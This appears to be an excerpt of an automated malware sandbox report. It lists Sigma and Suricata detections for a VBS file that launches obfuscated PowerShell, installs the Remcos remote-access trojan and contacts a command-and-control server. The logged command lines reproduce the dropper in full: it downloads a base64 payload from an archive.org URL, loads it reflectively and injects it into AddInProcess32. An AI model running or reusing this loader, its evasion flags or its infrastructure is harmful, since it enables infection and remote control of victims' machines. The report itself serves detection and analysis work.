            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 4780, ProcessName: wscript.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5I
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 4780, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|
            Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5I

            Stealing of Sensitive Information

            barindex
            Sigma detected: Remcos
            Source: Registry Key setAuthor: Joe Security: Data: Details: 4B 50 28 47 63 4D 09 1F 3F 91 C0 C4 04 16 31 9C 89 72 0C C1 0A 04 A3 A6 E8 6B CD 38 92 C9 23 4B 9A 51 86 2C D4 8A 10 C6 43 F1 3E D1 3A A5 AE D8 97 7D 69 29 C5 15 58 BB D5 4B 11 1B 5C 8E 57 6F BB 9B 14 E4 25 B2 42 CC E7 1A 86 00 AB C2 6E E3 D6 AE C6 13 BE FA 9B 97 07 B5 36 A7 96 94 97 40 8B 13 F4 35 71 82 4E 46 DA 37 31 FD 23 07 21 62 D4 AE A6 04 BF B0 39 AF D3 C0 0B 8A E9 48 CD AB E3 5F , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 4188, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-XDNGQ0\exepath

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T10:58:07.298698+020020204231Exploit Kit Activity Detected188.114.97.3443192.168.2.649712TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T10:58:07.298698+020020204241Exploit Kit Activity Detected188.114.97.3443192.168.2.649712TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T10:58:09.556119+020020327761Malware Command and Control Activity Detected192.168.2.649713181.236.206.32404TCP
            2024-09-26T10:58:12.269130+020020327761Malware Command and Control Activity Detected192.168.2.649715181.236.206.32404TCP
            2024-09-26T10:58:14.960707+020020327761Malware Command and Control Activity Detected192.168.2.649716181.236.206.32404TCP
            2024-09-26T10:58:17.587794+020020327761Malware Command and Control Activity Detected192.168.2.649720181.236.206.32404TCP
            2024-09-26T10:58:20.242842+020020327761Malware Command and Control Activity Detected192.168.2.649722181.236.206.32404TCP
            2024-09-26T10:58:22.913558+020020327761Malware Command and Control Activity Detected192.168.2.649724181.236.206.32404TCP
            2024-09-26T10:58:25.555536+020020327761Malware Command and Control Activity Detected192.168.2.649725181.236.206.32404TCP
            2024-09-26T10:58:28.210996+020020327761Malware Command and Control Activity Detected192.168.2.649726181.236.206.32404TCP
            2024-09-26T10:58:30.882978+020020327761Malware Command and Control Activity Detected192.168.2.649727181.236.206.32404TCP
            2024-09-26T10:58:33.508255+020020327761Malware Command and Control Activity Detected192.168.2.649728181.236.206.32404TCP
            2024-09-26T10:58:36.133301+020020327761Malware Command and Control Activity Detected192.168.2.649729181.236.206.32404TCP
            2024-09-26T10:58:38.805103+020020327761Malware Command and Control Activity Detected192.168.2.649730181.236.206.32404TCP
            2024-09-26T10:58:41.449621+020020327761Malware Command and Control Activity Detected192.168.2.649732181.236.206.32404TCP
            2024-09-26T10:58:44.056777+020020327761Malware Command and Control Activity Detected192.168.2.652102181.236.206.32404TCP
            2024-09-26T10:58:46.695749+020020327761Malware Command and Control Activity Detected192.168.2.652103181.236.206.32404TCP
            2024-09-26T10:58:49.321937+020020327761Malware Command and Control Activity Detected192.168.2.652104181.236.206.32404TCP
            2024-09-26T10:58:51.977856+020020327761Malware Command and Control Activity Detected192.168.2.652105181.236.206.32404TCP
            2024-09-26T10:58:54.639365+020020327761Malware Command and Control Activity Detected192.168.2.652106181.236.206.32404TCP
            2024-09-26T10:58:57.289503+020020327761Malware Command and Control Activity Detected192.168.2.652107181.236.206.32404TCP
            2024-09-26T10:58:59.931275+020020327761Malware Command and Control Activity Detected192.168.2.652108181.236.206.32404TCP
            2024-09-26T10:59:02.575895+020020327761Malware Command and Control Activity Detected192.168.2.652109181.236.206.32404TCP
            2024-09-26T10:59:05.211109+020020327761Malware Command and Control Activity Detected192.168.2.652111181.236.206.32404TCP
